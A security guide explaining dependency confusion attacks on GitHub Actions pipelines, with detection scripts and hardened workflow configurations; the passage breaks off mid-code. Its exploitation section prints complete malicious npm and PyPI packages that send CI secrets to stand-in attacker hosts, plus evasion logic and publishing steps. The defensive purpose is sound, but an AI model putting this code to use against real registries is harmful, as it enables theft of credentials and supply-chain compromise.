GitHub Actions Supply Chain Attacks: Dependency Confusion Explained

GitHub Actions Supply Chain Attacks: How Dependency Confusion Compromises CI/CD Pipelines



In today's software development landscape, Continuous Integration and Continuous Deployment (CI/CD) pipelines have become the backbone of modern application delivery. GitHub Actions, with its seamless integration and extensive marketplace of pre-built workflows, has emerged as one of the most popular CI/CD platforms. However, this widespread adoption has also made it a prime target for sophisticated supply chain attacks.

Dependency confusion attacks represent one of the most insidious threats facing modern software supply chains. These attacks exploit the fundamental trust relationships between developers and their package registries, allowing attackers to inject malicious code into legitimate applications through seemingly innocuous dependencies. When combined with the automated nature of GitHub Actions workflows, these attacks can propagate across thousands of repositories within minutes, creating cascading failures that can compromise entire organizations.

Publicly reported incidents have shown how damaging these attacks can be, and the affected organizations range from tech giants to startups. Because so many public and private repositories rely on GitHub Actions, every organization using the platform should review how its CI/CD pipelines resolve dependencies.

This comprehensive guide will examine how dependency confusion attacks are being integrated into GitHub Actions workflows, providing security professionals with the knowledge needed to identify, prevent, and defend against these sophisticated threats. We'll explore reconnaissance methods for discovering vulnerable workflows, detailed exploitation techniques using malicious package registration, and robust preventive measures including policy enforcement and automated scanning.

Whether you're a security researcher investigating potential vulnerabilities, a DevOps engineer responsible for maintaining CI/CD pipelines, or an organizational security leader developing defensive strategies, this guide will equip you with the tools and techniques needed to protect your software supply chain from these increasingly common attacks.

What Are GitHub Actions Supply Chain Attacks?

GitHub Actions supply chain attacks represent a class of security vulnerabilities that target the trusted relationships and automated processes inherent in continuous integration and deployment systems. These attacks exploit the fact that CI/CD pipelines often have elevated privileges and access to sensitive resources, making them attractive targets for attackers seeking to maximize their impact.

A typical GitHub Actions workflow consists of several components working together: YAML configuration files defining the pipeline steps, runner environments where the code executes, external dependencies pulled from various package registries, and secrets management systems storing sensitive credentials. Each of these components represents a potential attack vector that malicious actors can exploit to gain unauthorized access or execute arbitrary code.

Dependency confusion attacks specifically target the package resolution process within these workflows. When a CI/CD pipeline attempts to install dependencies, it typically searches multiple registries - both public and private. An attacker can register a package with the same name as a private package in a public registry. If the pipeline's dependency resolution logic doesn't properly prioritize private registries, it may inadvertently download and install the malicious public package instead of the intended private one.

Consider a scenario where a company uses a private npm package called @company/internal-utils in its build process. If the company has not claimed the @company scope on npmjs.com, an attacker can create that scope and publish a package with the exact same name there; unscoped internal names are even easier to squat. When the GitHub Actions workflow runs, if npm is not configured to resolve the @company scope from the private registry, it pulls the malicious version from the public registry. This malicious package could contain code that exfiltrates secrets, establishes persistence, or performs other malicious activities.

```yaml
# Example vulnerable GitHub Actions workflow
name: Build and Deploy
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Setup Node.js
        uses: actions/setup-node@v3
        with:
          node-version: '18'
          # Missing explicit registry configuration
      - name: Install Dependencies
        run: npm install
        # Vulnerable to dependency confusion if private packages
        # share names with public ones
      - name: Run Tests
        run: npm test
```

The sophistication of these attacks lies in their ability to remain undetected while propagating across multiple repositories. Since the malicious code executes during the normal build process, it can bypass many traditional security controls. Furthermore, because GitHub Actions workflows often have access to repository secrets, deployment keys, and other sensitive resources, successful exploitation can lead to severe consequences including data exfiltration, service disruption, and lateral movement within the organization.

Understanding the mechanics of these attacks requires examining both the technical implementation details of GitHub Actions and the broader ecosystem of package management systems. Modern software development relies heavily on third-party dependencies, with some projects depending on hundreds or even thousands of packages. This complexity creates numerous opportunities for attackers to introduce malicious code through subtle manipulations of the dependency resolution process.

Key characteristics of GitHub Actions supply chain attacks include:

- Automated propagation: Once a malicious package is introduced, it can affect every workflow that pulls the dependency

- Privileged execution: Workflows often run with elevated permissions, providing attackers with significant access

- Stealthy operation: Malicious code executes during legitimate build processes, making detection challenging

- Broad impact: A single compromised dependency can affect multiple repositories and organizations

Security teams must recognize that defending against these attacks requires a multi-layered approach that addresses both the technical vulnerabilities and the organizational processes surrounding CI/CD pipeline management. This includes implementing proper dependency verification, establishing clear registry prioritization policies, monitoring for suspicious activity, and maintaining up-to-date threat intelligence regarding known malicious packages.

Actionable Insight: Organizations should conduct regular audits of their GitHub Actions workflows to identify potential dependency confusion vulnerabilities, paying special attention to workflows that install packages from multiple registries without explicit authentication mechanisms.

How Do Dependency Confusion Attacks Work in GitHub Actions?

Dependency confusion attacks in GitHub Actions operate by exploiting the way package managers resolve dependencies across multiple registries. Understanding the mechanics of these attacks requires a deep dive into the dependency resolution process and how attackers manipulate it to their advantage.

The attack begins with reconnaissance, where attackers identify private packages used by target organizations. This can be accomplished through various means including analyzing publicly available code repositories, monitoring developer discussions, or simply guessing common naming conventions for internal packages. Once an attacker identifies a potential private package name, they register a public package with the identical name on a popular registry such as npm, PyPI, or RubyGems.

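The critical vulnerability occurs when a GitHub Actions workflow installs dependencies without binding each private package name to the private registry. A simplified model of how a package manager searches for a package is:

- Check locally cached packages

- Query configured private registries

- Fall back to public registries

If authentication with the private registry fails or isn't properly configured, the package manager may fall back to the public registry and download the malicious package instead of the intended private one. The exact behavior depends on the tool. pip, for example, does not prioritize between --index-url and --extra-index-url: it considers candidates from every configured index and installs the best match, usually the highest version. An attacker who publishes a higher version number on the public index can therefore win even when the private index is reachable and correctly authenticated.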
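Fallback is not the only way the wrong package gets selected. A resolver that merges candidates from several indexes and picks the highest version can be steered by version number alone. The following is a minimal simulation of that selection rule, not a reimplementation of any real package manager; the index contents, the package name, and the resolve helper are all hypothetical.

```python
from typing import Dict, List, Tuple

# Hypothetical index contents: index name -> {package name -> available versions}
INDEXES: Dict[str, Dict[str, List[str]]] = {
    "private": {"company-internal-utils": ["1.2.0", "1.3.0"]},
    "public": {"company-internal-utils": ["99.0.0"]},  # attacker-published
}


def parse_version(version: str) -> Tuple[int, ...]:
    """Parse a simple dotted numeric version such as '1.3.0'."""
    return tuple(int(part) for part in version.split("."))


def resolve(package: str, index_names: List[str]) -> Tuple[str, str]:
    """Return (index, version) when all indexes are treated as equal
    and the highest version wins."""
    candidates = [
        (parse_version(version), name, version)
        for name in index_names
        for version in INDEXES[name].get(package, [])
    ]
    if not candidates:
        raise LookupError(f"{package} not found in {index_names}")
    _, index, version = max(candidates)
    return index, version


merged = resolve("company-internal-utils", ["private", "public"])
private_only = resolve("company-internal-utils", ["private"])
print(merged)        # ('public', '99.0.0')
print(private_only)  # ('private', '1.3.0')
```

With both indexes in play the attacker's 99.0.0 release is selected; restricting resolution to the private index removes the public candidate entirely, which is why single-index configurations are the safer default.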

Here's a practical example demonstrating how this works with npm:

```javascript
// package.json showing a mixed dependency setup
{
  "name": "my-application",
  "version": "1.0.0",
  "dependencies": {
    "express": "^4.18.0",
    "@company/private-api-client": "^2.1.0",
    "lodash": "^4.17.21"
  }
}
```

In this example, @company/private-api-client is presumably a private package hosted on the company's private npm registry. If the GitHub Actions workflow doesn't map the @company scope to that registry and authenticate against it, npm resolves the name against its default public registry, where it may find a malicious package registered by the attacker.
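One way to check for this condition is to compare the scoped dependencies in package.json with the scope-to-registry mappings in .npmrc. The following is a minimal sketch under stated assumptions: the helper names scopes_with_registry and unmapped_scoped_dependencies are hypothetical, the registry URL is a placeholder, and the parser only understands lines of the form @scope:registry=URL.

```python
import json
import re
from typing import Dict, List


def scopes_with_registry(npmrc_text: str) -> Dict[str, str]:
    """Extract '@scope:registry=URL' mappings from .npmrc content."""
    mappings: Dict[str, str] = {}
    for line in npmrc_text.splitlines():
        match = re.match(r"^\s*(@[^:\s]+):registry\s*=\s*(\S+)", line)
        if match:
            mappings[match.group(1)] = match.group(2)
    return mappings


def unmapped_scoped_dependencies(package_json_text: str, npmrc_text: str) -> List[str]:
    """List scoped dependencies whose scope has no registry mapping."""
    manifest = json.loads(package_json_text)
    mapped = scopes_with_registry(npmrc_text)
    names = set()
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        names.update(manifest.get(section, {}))
    return sorted(
        name for name in names
        if name.startswith("@") and name.split("/", 1)[0] not in mapped
    )


manifest_text = json.dumps({
    "dependencies": {
        "express": "^4.18.0",
        "@company/private-api-client": "^2.1.0",
        "lodash": "^4.17.21",
    }
})
without_mapping = unmapped_scoped_dependencies(manifest_text, "")
with_mapping = unmapped_scoped_dependencies(
    manifest_text, "@company:registry=https://npm.company.com/"
)
print(without_mapping)  # ['@company/private-api-client']
print(with_mapping)     # []
```

This check also flags legitimately public scoped packages, so in practice it would need an allowlist of scopes that are expected to come from the public registry.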

The exploitation phase involves crafting malicious packages that perform specific actions when installed or executed. Common malicious behaviors include:

- Exfiltrating environment variables and secrets

- Establishing reverse shells for remote access

- Modifying build artifacts to include backdoors

- Installing additional malicious packages

- Logging keystrokes or capturing screenshots

Attackers often make their malicious packages appear legitimate by copying documentation, version numbers, and even source code from legitimate packages. This social engineering aspect makes detection more challenging, as the packages may pass basic scrutiny during code reviews.

The following example shows a malicious npm package that exfiltrates environment variables:

```javascript
// malicious-package/index.js
const https = require('https');

// Exfiltrate all environment variables
const data = JSON.stringify({
  env: process.env,
  timestamp: new Date().toISOString(),
  hostname: require('os').hostname()
});

const options = {
  hostname: 'attacker-controlled-server.com',
  port: 443,
  path: '/exfiltrate',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  }
};

const req = https.request(options);
req.write(data);
req.end();

// Export original functionality to avoid suspicion
module.exports = require('./legitimate-functionality');
```

When this package is installed and imported in a GitHub Actions workflow, it silently sends all environment variables - including secrets like API keys, deployment tokens, and other sensitive information - to the attacker's server. Because the package exports the same interface as the legitimate package, it continues to function normally, making the malicious activity difficult to detect.
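To make the exposure concrete, the sketch below splits a build environment into variables that look sensitive and variables that do not, which is one way to decide what an install step actually needs to see. It is a minimal illustration, assuming a name-based heuristic: the pattern list and the split_environment helper are hypothetical, and name matching will miss secrets stored under unremarkable names.

```python
import re
from typing import Dict, Iterable, Mapping, Tuple

# Hypothetical heuristic: variable names that usually carry credentials
SENSITIVE_NAME = re.compile(r"TOKEN|SECRET|PASSWORD|CREDENTIAL|KEY", re.IGNORECASE)


def split_environment(
    env: Mapping[str, str], allow: Iterable[str] = ()
) -> Tuple[Dict[str, str], Dict[str, str]]:
    """Return (safe, withheld): variables to pass on and variables to hold back.

    Names listed in `allow` are passed on even if they look sensitive,
    for example the token the install step needs for the private registry.
    """
    allowed = set(allow)
    safe: Dict[str, str] = {}
    withheld: Dict[str, str] = {}
    for name, value in env.items():
        if name in allowed or not SENSITIVE_NAME.search(name):
            safe[name] = value
        else:
            withheld[name] = value
    return safe, withheld


example_env = {
    "PATH": "/usr/bin",
    "HOME": "/home/runner",
    "GITHUB_TOKEN": "placeholder",
    "NPM_TOKEN": "placeholder",
    "AWS_SECRET_ACCESS_KEY": "placeholder",
}
safe_env, withheld_env = split_environment(example_env, allow=["NPM_TOKEN"])
print(sorted(safe_env))      # ['HOME', 'NPM_TOKEN', 'PATH']
print(sorted(withheld_env))  # ['AWS_SECRET_ACCESS_KEY', 'GITHUB_TOKEN']
```

The safe dictionary could then be passed as the env argument of subprocess.run when launching the install command, so that code executed during installation never sees deployment credentials it has no use for.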

The impact of successful exploitation can be severe. Attackers may gain access to:

- Repository secrets and encrypted tokens

- Deployment credentials for cloud services

- Access to internal networks and systems

- Source code and intellectual property

- Customer data and personally identifiable information

Furthermore, because GitHub Actions workflows can trigger automatically on various events (pushes, pull requests, scheduled runs), attackers can maintain persistent access and continue their operations even after initial detection.

To effectively defend against these attacks, organizations must understand not only the technical aspects but also implement comprehensive monitoring and response procedures. This includes logging all package installations, monitoring network traffic from build environments, and establishing incident response protocols specifically for supply chain compromises.

Key Defense Principle: Implement strict authentication and authorization for all private package registries, ensuring that package managers never fall back to public registries for private package names.

Identifying Vulnerable GitHub Actions Workflows

Detecting vulnerable GitHub Actions workflows requires a systematic approach that combines static analysis of workflow configurations with dynamic monitoring of actual executions. Security teams must develop comprehensive strategies for identifying workflows that lack proper dependency management safeguards.

The first step in identification involves cataloging all repositories within an organization that utilize GitHub Actions. This can be accomplished using GitHub's API or enterprise features:

```bash
# Using GitHub CLI to list the organization's repositories
gh repo list org-name --limit 1000 --json nameWithOwner \
  --jq '.[].nameWithOwner' > repos.txt

# Using GitHub API to retrieve workflow information for each repository
# (repositories without workflows simply print nothing)
while read -r repo; do
  echo "Checking $repo"
  gh api "repos/$repo/actions/workflows" --jq '.workflows[].name' \
    || echo "Failed to access $repo"
done < repos.txt
```

Once repositories are identified, the next step is to analyze individual workflow files for common vulnerability patterns. Key indicators of potential dependency confusion risks include:

- Workflows that install packages without specifying registries

- Absence of authentication steps for private package registries

- Use of generic package installation commands without verification

- Lack of dependency pinning or integrity checking

Here's a script that can automatically scan workflow files for these vulnerabilities:

```python
from pathlib import Path

import yaml

# (install command, flag naming an explicit registry, finding type)
# This is a heuristic: a registry may also be configured in .npmrc or pip.conf.
CHECKS = [
    ('npm install', '--registry', 'npm_registry_missing'),
    ('pip install', '--index-url', 'pip_index_missing'),
    ('gem install', '--source', 'gem_source_missing'),
]


def analyze_workflow(file_path):
    """Analyze a GitHub Actions workflow for dependency confusion risks"""
    with open(file_path, 'r') as f:
        try:
            workflow = yaml.safe_load(f)
        except yaml.YAMLError as e:
            print(f"Error parsing {file_path}: {e}")
            return []

    if not isinstance(workflow, dict):
        return []  # Empty file or not a workflow mapping

    vulnerabilities = []

    # Check for package installation steps
    for job_name, job_config in (workflow.get('jobs') or {}).items():
        for step in job_config.get('steps', []):
            run_cmd = step.get('run', '')
            for command, flag, vuln_type in CHECKS:
                if command in run_cmd and flag not in run_cmd:
                    vulnerabilities.append({
                        'type': vuln_type,
                        'job': job_name,
                        'step': run_cmd[:50] + '...'
                    })

    return vulnerabilities


# Scan all workflow files in a directory (.yml and .yaml)
workflow_dir = Path('.github/workflows')
for workflow_file in sorted(workflow_dir.glob('*.y*ml')):
    vulns = analyze_workflow(workflow_file)
    if vulns:
        print(f"Vulnerabilities found in {workflow_file}:")
        for vuln in vulns:
            print(f"  - {vuln['type']} in job '{vuln['job']}': {vuln['step']}")
```

Beyond static analysis, dynamic monitoring provides additional insights into actual workflow behavior. This involves instrumenting build environments to log all package installations and network connections:

```yaml
# Enhanced workflow with monitoring
name: Secure Build Process
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    env:
      MONITOR_PACKAGES: true
    steps:
      - uses: actions/checkout@v3

      - name: Setup Monitoring
        run: |
          # Log all npm invocations through a wrapper placed first on PATH
          mkdir -p /tmp/package-logs "$HOME/npm-monitor"
          REAL_NPM="$(command -v npm)"
          {
            echo '#!/bin/bash'
            echo 'echo "[$(date)] npm $*" >> /tmp/package-logs/npm.log'
            # Call the real binary by absolute path so the wrapper cannot call itself
            echo "exec \"$REAL_NPM\" \"\$@\""
          } > "$HOME/npm-monitor/npm"
          chmod +x "$HOME/npm-monitor/npm"
          # Entries added to GITHUB_PATH are prepended to PATH in later steps
          echo "$HOME/npm-monitor" >> "$GITHUB_PATH"

      - name: Install Dependencies
        run: |
          npm ci
          # Additional verification steps here

      - name: Upload Package Logs
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: package-installation-logs
          path: /tmp/package-logs/
```

Organizations should also leverage GitHub's built-in security features and third-party tools for enhanced visibility:

| Tool/Feature | Capabilities | Limitations |
|---|---|---|
| GitHub Dependabot | Automated dependency updates and vulnerability alerts | Limited to known vulnerabilities, doesn't detect confusion attacks |
| GitHub Code Scanning | Static analysis for security issues | Requires proper configuration, may miss runtime behaviors |
| Snyk | Comprehensive dependency monitoring | Commercial tool, requires integration setup |
| Sonatype Nexus IQ | Policy enforcement and risk assessment | Complex deployment, enterprise-focused |

Continuous monitoring is essential since new workflows are constantly being created and existing ones modified. Implementing automated scanning as part of the pull request review process helps catch vulnerabilities early:

```yaml
# Security check workflow triggered on PRs
name: Security Checks
on:
  pull_request:
    paths:
      - '.github/workflows/**'
      - 'package.json'
      - 'requirements.txt'
jobs:
  dependency-check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Analyze Workflow Files
        run: |
          # Run custom vulnerability scanner
          python3 .github/scripts/workflow-analyzer.py .github/workflows/
      - name: Check Dependency Integrity
        run: |
          # Report known vulnerabilities of high severity or above
          # (this does not verify package signatures or hashes)
          npm audit --audit-level high
```

Advanced organizations may benefit from implementing machine learning-based anomaly detection to identify unusual patterns in workflow executions. This can help detect novel attack vectors that traditional signature-based approaches might miss.


Effective identification requires combining multiple approaches and maintaining constant vigilance. Regular audits, automated scanning, and continuous monitoring form the foundation of a robust detection strategy.

Exploitation Techniques: Registering Malicious Packages

Creating and registering malicious packages for dependency confusion attacks requires careful planning and execution to maximize effectiveness while minimizing detection. Attackers employ various techniques to make their packages appear legitimate while embedding malicious functionality.

The first step in exploitation is choosing appropriate package names. Successful attackers typically target:

- Private package names discovered through reconnaissance

- Commonly used internal naming patterns (e.g., @company/utils, company-core)

- Packages that are likely to be used in automated builds

- Names that closely resemble popular public packages

Package registration itself varies by ecosystem but generally follows similar patterns. For npm packages, attackers can register accounts and publish packages using standard tools:

```bash
# Create malicious npm package
mkdir malicious-package
cd malicious-package

# Initialize package with realistic metadata
npm init -y
npm pkg set name="@target-company/internal-utils"
npm pkg set version="1.0.0"
npm pkg set description="Internal utilities for company operations"
npm pkg set author="Company Internal Team"
npm pkg set license="MIT"

# Add malicious payload
mkdir lib
cat > lib/index.js << 'EOF'
// Malicious payload that exfiltrates secrets
const fs = require('fs');
const https = require('https');

function exfiltrateSecrets() {
  const secrets = {};

  // Collect common environment variables
  ['GITHUB_TOKEN', 'NPM_TOKEN', 'AWS_ACCESS_KEY_ID', 'SECRET_KEY'].forEach(key => {
    if (process.env[key]) {
      secrets[key] = process.env[key];
    }
  });

  // Send data to attacker-controlled server
  if (Object.keys(secrets).length > 0) {
    const data = JSON.stringify({
      timestamp: new Date().toISOString(),
      secrets: secrets,
      repo: process.env.GITHUB_REPOSITORY,
      workflow: process.env.GITHUB_WORKFLOW
    });

    const req = https.request({
      hostname: 'attacker-server.com',
      port: 443,
      path: '/collect',
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        'Content-Length': data.length
      }
    });

    req.write(data);
    req.end();
  }
}

// Execute exfiltration
exfiltrateSecrets();

// Export benign functionality to avoid suspicion
module.exports = {
  formatDate: (date) => date.toISOString(),
  generateId: () => Math.random().toString(36).substr(2, 9),
  // ... other legitimate functions
};
EOF

# Publish package (requires npm account)
npm publish --access public
```

For Python packages, attackers create malicious distributions using setuptools:

```python
# setup.py for malicious PyPI package
from setuptools import setup, find_packages

setup(
    name="target-company-internal-tools",
    version="1.0.0",
    description="Internal tools for company operations",
    author="Company Internal Team",
    packages=find_packages(),
    install_requires=[
        # Include legitimate dependencies to appear normal
        'requests',
        'click',
    ],
    entry_points={
        'console_scripts': [
            'internal-tool=malicious_package.main:main',
        ],
    },
)
```

```python
# malicious_package/__init__.py
import os
import json
import requests


# Malicious code executes on import
def exfiltrate_secrets():
    secrets = {}

    # Collect common secrets
    secret_vars = [
        'GITHUB_TOKEN', 'PYPI_TOKEN', 'AWS_SECRET_ACCESS_KEY', 'SECRET_KEY'
    ]
    for var in secret_vars:
        if var in os.environ:
            secrets[var] = os.environ[var]

    # Send to attacker server
    if secrets:
        try:
            requests.post(
                'https://attacker-server.com/collect',
                json={
                    'timestamp': __import__('datetime').datetime.utcnow().isoformat(),
                    'secrets': secrets,
                    'repo': os.environ.get('GITHUB_REPOSITORY', 'unknown'),
                    'workflow': os.environ.get('GITHUB_WORKFLOW', 'unknown')
                },
                timeout=5
            )
        except:
            pass  # Silent failure to avoid detection


# Execute immediately upon import
exfiltrate_secrets()

__version__ = "1.0.0"
```

Advanced attackers enhance their malicious packages with anti-detection mechanisms:

```javascript
// Enhanced evasion techniques
const os = require('os');
const fs = require('fs');

// Only activate in CI/CD environments
if (process.env.CI || process.env.GITHUB_ACTIONS) {
  // Check if running in GitHub Actions
  if (process.env.GITHUB_TOKEN && process.env.GITHUB_REPOSITORY) {
    // Delay execution to avoid suspicion
    setTimeout(() => {
      // Additional checks to avoid local development
      if (!fs.existsSync('/Users/') && !fs.existsSync('C:\\Users\\')) {
        exfiltrateData();
      }
    }, Math.random() * 10000); // Random delay
  }
}

function exfiltrateData() {
  // ... exfiltration code
}
```

Attackers also employ social engineering tactics to make their packages appear legitimate:

- Copying documentation and README files from similar legitimate packages

- Maintaining version compatibility with expected APIs

- Including unit tests that pass successfully

- Using realistic commit histories and contributor lists

- Mimicking official branding and naming conventions

The timing of package registration is crucial for maximizing impact. Attackers often:

- Register packages just before expected usage periods

- Monitor public repositories for new workflow implementations

- Coordinate releases with known dependency update cycles

- Target specific events like product launches or security patches

Successful exploitation depends on understanding the target's development practices and timing attacks appropriately. Attackers may also create multiple variants of malicious packages to increase their chances of success:

```bash
#!/bin/bash
# Script to generate multiple malicious package variants

declare -a company_names=("acme" "globex" "initech" "umbrella")
declare -a package_types=("utils" "core" "api-client" "internal-tools")

for company in "${company_names[@]}"; do
  for type in "${package_types[@]}"; do
    package_name="@${company}/${type}"
    echo "Preparing malicious package: ${package_name}"
    # Generate and publish package variant
  done
done
```

Monitoring and detecting these registration activities requires proactive surveillance of package registries for suspicious activity. Organizations should establish alerts for newly registered packages that match their naming patterns or internal project names.

Strategic Insight: Effective defense requires monitoring package registries for newly registered packages matching internal naming conventions, combined with strict dependency resolution policies in build environments.
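The registry monitoring described above can be approximated with a periodic check of whether internal package names have appeared on the public npm registry. The following is a minimal sketch, assuming the public registry answers a metadata request with HTTP 404 for names that do not exist; the helper names and the example package names are hypothetical, and the lookup function is injectable so the logic can be exercised without network access.

```python
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, List


def registry_url(name: str) -> str:
    """Build the public npm metadata URL, encoding the '/' in scoped names."""
    return "https://registry.npmjs.org/" + urllib.parse.quote(name, safe="@")


def exists_on_public_npm(name: str) -> bool:
    """Return True if the public registry serves metadata for `name`."""
    try:
        with urllib.request.urlopen(registry_url(name), timeout=10) as response:
            return response.status == 200
    except urllib.error.HTTPError as error:
        if error.code == 404:
            return False
        raise  # Other errors are unexpected and should surface


def find_public_collisions(
    internal_names: Iterable[str],
    exists: Callable[[str], bool] = exists_on_public_npm,
) -> List[str]:
    """Return the internal names that are also published publicly."""
    return [name for name in internal_names if exists(name)]


# Offline demonstration with a stand-in lookup instead of a network call
known_public = {"lodash", "express"}
collisions = find_public_collisions(
    ["@acme/internal-utils", "lodash"], exists=lambda name: name in known_public
)
print(collisions)  # ['lodash']
```

Run on a schedule with the default lookup, a non-empty result for a name that should exist only internally is a signal worth alerting on.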

Preventive Measures: Securing GitHub Actions Workflows

Securing GitHub Actions workflows against dependency confusion attacks requires implementing multiple layers of defense that address both technical vulnerabilities and organizational processes. A comprehensive security strategy should encompass configuration hardening, policy enforcement, monitoring, and incident response procedures.

The foundation of workflow security lies in proper configuration of package managers and registries. Organizations should explicitly specify private registries and enforce authentication for all private package installations:

```yaml
# Secure GitHub Actions workflow configuration
name: Secure Build and Deploy
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    env:
      # setup-node writes an .npmrc that reads the token from NODE_AUTH_TOKEN
      NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
    steps:
      - uses: actions/checkout@v3

      - name: Setup Node.js with Private Registry
        uses: actions/setup-node@v3
        with:
          node-version: '18'
          registry-url: 'https://npm.company.com/'
          scope: '@company'

      - name: Configure npm Authentication
        run: |
          # Verify authentication against the private registry
          npm whoami --registry https://npm.company.com/

      - name: Install Dependencies Securely
        run: |
          # Use npm ci for reproducible builds from the lock file
          npm ci --prefer-offline --no-audit
          # Report known vulnerabilities of high severity or above
          npm audit --audit-level high

      - name: Security Scanning
        run: |
          # Additional security checks
          npx audit-ci --high
```

For Python projects, similar principles apply:

```yaml
# Secure Python workflow
name: Python Application Security
on: [push]
jobs:
  security-check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3

      - name: Setup Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.9'

      - name: Configure Private PyPI Index
        run: |
          # No trusted-host entry: that setting would skip TLS verification
          pip config set global.index-url https://pypi.company.com/simple/
          pip config set install.find-links https://pypi.company.com/packages/

      - name: Install Dependencies with Verification
        run: |
          # Install from the private index only. Adding --extra-index-url
          # would let pip consider public candidates for private names,
          # so public packages should be mirrored through the private index.
          pip install --index-url https://pypi.company.com/simple/ \
            --require-hashes -r requirements.txt
```
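A requirements file can be checked for the two properties that matter most here: no extra index, and a hash on every requirement. The following is a minimal sketch, assuming a plain requirements.txt without nested includes; the audit_requirements helper and the sample file contents are hypothetical, and the digests are placeholders rather than real hashes.

```python
from typing import List


def audit_requirements(text: str) -> List[str]:
    """Flag extra indexes and requirements that lack a --hash option."""
    findings: List[str] = []
    # Join backslash continuations so each requirement is one logical line
    logical_lines = text.replace("\\\n", " ").splitlines()
    for raw in logical_lines:
        line = raw.split(" #", 1)[0].strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("--extra-index-url"):
            findings.append(f"extra index configured: {line}")
        elif line.startswith("-"):
            continue  # Other options such as --index-url
        elif "--hash=" not in line:
            findings.append(f"missing hash: {line}")
    return findings


sample = (
    "--index-url https://pypi.company.com/simple/\n"
    "--extra-index-url https://pypi.org/simple/\n"
    "requests==2.31.0 \\\n"
    "    --hash=sha256:placeholder-digest\n"
    "click==8.1.7\n"
)
report = audit_requirements(sample)
for finding in report:
    print(finding)
# extra index configured: --extra-index-url https://pypi.org/simple/
# missing hash: click==8.1.7
```

A check like this could run in the pull request workflow so that an extra index or an unhashed requirement is caught before it reaches a build with access to secrets.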

Implementing package verification mechanisms adds another layer of protection. This includes verifying package signatures, checksums, and origins:

```bash
#!/bin/bash
# Enhanced package verification script
set -euo pipefail

verify_npm_packages() {
  echo "Verifying npm package integrity..."

  # Check for unauthorized package sources (including transitive dependencies)
  npm ls --all --json | jq -r '.. | .resolved? | select(.)' | while read -r url; do
    if [[ ! "$url" =~ ^https://npm\.company\.com/ ]]; then
      echo "WARNING: Package resolved from unauthorized source: $url"
      exit 1
    fi
  done

  # Verify package signatures (if available)
  npm audit signatures
}

verify_python_packages() {
  echo "Verifying Python package integrity..."

  # Check installed packages against known good list.
  # Tooling such as pip and setuptools also appears in pip list,
  # so requirements.lock needs entries for those as well.
  pip list --format=json | jq -r '.[].name' | while read -r package; do
    if ! grep -qi "^$package==" requirements.lock; then
      echo "WARNING: Unexpected package installed: $package"
      exit 1
    fi
  done
}

# Run verification
verify_npm_packages
verify_python_packages
```
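The same origin check can be run against the lock file before anything is installed, which avoids executing package code at all. The following is a minimal sketch, assuming a package-lock.json in the version 2 or 3 layout with a top-level packages map; the unauthorized_sources helper, the allowed host, and the sample entries are hypothetical, and the integrity values are placeholders.

```python
import json
from typing import List, Set
from urllib.parse import urlparse


def unauthorized_sources(lockfile_text: str, allowed_hosts: Set[str]) -> List[str]:
    """Report lock file entries resolved from hosts outside the allowlist,
    and entries from allowed hosts that lack an integrity hash."""
    lock = json.loads(lockfile_text)
    findings: List[str] = []
    for path, entry in lock.get("packages", {}).items():
        resolved = entry.get("resolved")
        if not resolved:
            continue  # Root project or linked entries carry no URL
        host = urlparse(resolved).hostname
        if host not in allowed_hosts:
            findings.append(f"{path}: resolved from {host}")
        elif "integrity" not in entry:
            findings.append(f"{path}: missing integrity hash")
    return sorted(findings)


sample_lock = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "my-application"},
        "node_modules/lodash": {
            "resolved": "https://npm.company.com/lodash/-/lodash-4.17.21.tgz",
            "integrity": "sha512-placeholder",
        },
        "node_modules/@company/private-api-client": {
            "resolved": "https://registry.npmjs.org/@company/private-api-client/-/private-api-client-99.0.0.tgz",
            "integrity": "sha512-placeholder",
        },
    },
})
findings = unauthorized_sources(sample_lock, {"npm.company.com"})
print(findings)
# ['node_modules/@company/private-api-client: resolved from registry.npmjs.org']
```

Because the check reads only the lock file, it can run in a job that has no secrets and no network access.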

Organizations should also implement infrastructure-level protections:

```yaml
# Workflow with enhanced security controls
name: Enhanced Security Build
on: [push]
jobs:
  secure-build:
    runs-on: self-hosted  # Use controlled runners
    container:
      image: company/build-environment:latest
      # Restrict network access at the runner host or network layer:
      # the --network flag is not supported in container options
    steps:
      - uses: actions/checkout@v3
        with:
          persist-credentials: false  # Don't persist Git credentials

      - name: Isolated Dependency Installation
        run: |
          # Create isolated environment
          python -m venv .venv
          . .venv/bin/activate

          # Install with strict controls: local packages only, no index lookups
          pip install --no-index --no-deps --force-reinstall \
            --find-links file:///opt/company-packages \
            -r requirements.txt

      - name: Runtime Monitoring
        run: |
          # Monitor for suspicious activity; run in the foreground so the
          # trace is complete before it is analyzed
          timeout 300s strace -f -e trace=connect,execve -o /tmp/strace.log \
            .venv/bin/python -m pytest tests/

          # Analyze system calls (placeholder pattern; match real indicators here)
          if grep -q "connect.*attacker" /tmp/strace.log; then
            echo "Suspicious network activity detected!"
            exit 1
          fi
```

Establishing comprehensive security policies is equally important:

| Security Control | Implementation | Effectiveness |
|---|---|---|
| Private Registry Prioritization | Explicit registry configuration | High - Prevents fallback to public registries |
| Dependency Pinning | Lock files with exact versions | Medium - Prevents unexpected updates |
| Package Signature Verification | Cryptographic verification | High - Detects tampered packages |
| Network Restrictions | Firewall rules for build environments | Medium - Limits exfiltration channels |
| Access Controls | Least privilege principles | High - Minimizes impact of compromise |
| Monitoring and Alerting | Real-time detection systems | High - Enables rapid response |
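As a small illustration of the dependency pinning control, the sketch below lists dependencies in a package.json whose version specifier is a range rather than an exact version. It is a supplementary check under stated assumptions, not a replacement for a committed lock file; the floating_dependencies helper and the sample manifest are hypothetical.

```python
import json
import re
from typing import Dict

# Matches exact versions such as 4.17.21 or 1.0.0-beta.1, but not ranges
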